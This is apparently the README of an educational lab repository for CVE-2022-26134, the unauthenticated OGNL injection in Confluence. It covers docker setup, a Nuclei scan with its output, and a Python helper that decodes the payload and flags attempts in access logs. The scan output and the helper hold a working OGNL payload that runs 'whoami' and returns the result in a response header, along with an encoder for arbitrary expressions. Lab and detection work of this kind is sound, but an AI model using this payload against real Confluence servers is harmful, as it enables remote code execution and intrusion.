Confluence Server and Confluence Data Center contain a critical unauthenticated remote code execution vulnerability, CVE-2022-26134, disclosed in a security advisory released by Atlassian on June 2, 2022. The vulnerability was unpatched when the advisory was published on June 2 and was already being exploited in the wild. As of June 3, both fixed versions and a temporary workaround are available.
This repository is intended only for experimental and educational purposes.
Running the vulnerable environment
docker-compose up
Once started, you can access the Confluence server using the following URL
- The first time visiting the site you will be taken through setup.
- Don't check any boxes and select "Next" on the "Get apps" page.
- On the license key page click the link that says "Get an evaluation license"
- You will be redirected to my.atlassian.com. Make sure the license type selected is Confluence (Data Center). Type in whatever Organization name you like. Ensure the radio button under "Your instance is" is set to "up and running". Once you have verified these details, click the button "Generate License".
- A confirmation modal will pop up asking if you want to install it on the server: 127.0.0.1. Select "Yes"
- Selecting yes will automatically fill in the license key on your local instance of confluence. Select "Next"
- Choose "Standalone" deployment type and select "Next"
- On the page for setting up your database, fill in the details as follows:
  - Database type: PostgreSQL
  - Setup type: Simple
  - Hostname: db
  - Port: 5432
  - Database name: confluence
  - Username: confluence
  - Password: 123456789
- After filling in these fields, press the "Test connection" button. You should receive the message "Success! Database connected successfully". Then click "Next".
- It will begin setting up your database. This can take a little while; hang tight.
- Once the database setup is complete you will be on the "Load Content" page. Select the "Example Site" button.
- Next on the "Configure User Management" page select "Manage users and groups with Confluence".
- Next, on the "Configure System Administrator Account" page, create an account and select "Next".
- Once completed you will see that the setup was successful. Press "Start".
- It will ask you to "Create a space to store your work". Input any Space name you'd like.
- Skip the tutorial
- You've now completed the evaluation setup of Confluence Server.
The vulnerability is an OGNL injection affecting the HTTP server: the OGNL expression is placed in the URI path of an HTTP request. Any HTTP method appears to work, whether valid (GET, POST, PUT, etc.) or invalid (e.g. "BALH").
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Run the following Nuclei command:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
Scan Output
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
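As an added example (not code from this repository, from Atlassian or from the Nuclei project), the following Python decodes the percent-encoded path in the scan output above into its readable OGNL form, shows how a probe reads the command result back from the X-Cmd-Response header the payload sets, and runs a coarse detector over access-log lines that mimic the lab's requests. The log lines, their status codes and all function names are assumptions made for the example.

```python
"""
Helpers for the CVE-2022-26134 lab. Added example, not code from this
repository, Atlassian or Nuclei. It encodes/decodes the OGNL payload shown in
the scan output, reads a command result back from the X-Cmd-Response header,
and flags exploit attempts in constructed access-log lines.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import quote, unquote

# Decoded form of the payload in the Nuclei scan output: run `whoami`, read its
# stdout, and reflect it into a response header named X-Cmd-Response.
OGNL_WHOAMI = (
    '${(#a=@org.apache.commons.io.IOUtils@toString('
    '@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8"))'
    '.(@com.opensymphony.webwork.ServletActionContext@getResponse()'
    '.setHeader("X-Cmd-Response",#a))}'
)

# The request path exactly as it appears in the scan output above.
SCAN_PATH = (
    "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang."
    "Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22"
    "utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse"
    "%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
)


def encode_payload_path(expression: str) -> str:
    """Percent-encode an OGNL expression as one path segment, as the template does."""
    return "/" + quote(expression, safe="") + "/"


def decode_payload_path(path: str) -> str:
    """Recover the readable expression from a path seen in scan output or logs."""
    return unquote(path.strip("/"))


def command_output_from_headers(headers: Dict[str, str]) -> Optional[str]:
    """The payload writes command output into a response header, not the body,
    so a probe reads it from the headers (header names are case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "x-cmd-response":
            return value
    return None


# Constructed access-log lines in combined-log style (status codes are arbitrary).
# The first carries the whoami payload; the second uses a bogus method with a
# harmless arithmetic expression, which still counts because the method is not
# what triggers the evaluation.
SAMPLE_LOG: List[str] = [
    f'127.0.0.1 - - [03/Jun/2022:10:00:01 +0000] "GET {SCAN_PATH} HTTP/1.1" 302 0',
    '127.0.0.1 - - [03/Jun/2022:10:00:02 +0000] "BALH /%24%7B233*233%7D/ HTTP/1.1" 302 0',
    '127.0.0.1 - - [03/Jun/2022:10:00:03 +0000] "GET /login.action HTTP/1.1" 200 4512',
    '127.0.0.1 - - [03/Jun/2022:10:00:04 +0000] "POST /rest/api/content HTTP/1.1" 401 0',
]

REQUEST_LINE = re.compile(r'"(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_attempts(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (method, decoded target) for requests whose path contains an OGNL
    '${' after one round of percent-decoding. The method is deliberately not
    filtered, since any method (valid or not) reaches the vulnerable code."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        if "${" in target:
            hits.append((m.group("method"), target))
    return hits


if __name__ == "__main__":
    assert encode_payload_path(OGNL_WHOAMI) == SCAN_PATH
    print(decode_payload_path(SCAN_PATH))
    for method, target in flag_attempts(SAMPLE_LOG):
        print(f"OGNL attempt: {method} {target}")
```

The detector is intentionally coarse: it decodes the request target once and looks for `${`, which catches the template's payload and simple variants but not double-encoded paths, so treat it as a triage signal over the lab's logs rather than a complete rule. On the response side, a `X-Cmd-Response` header in a reply from the lab instance is direct confirmation that the expression was evaluated.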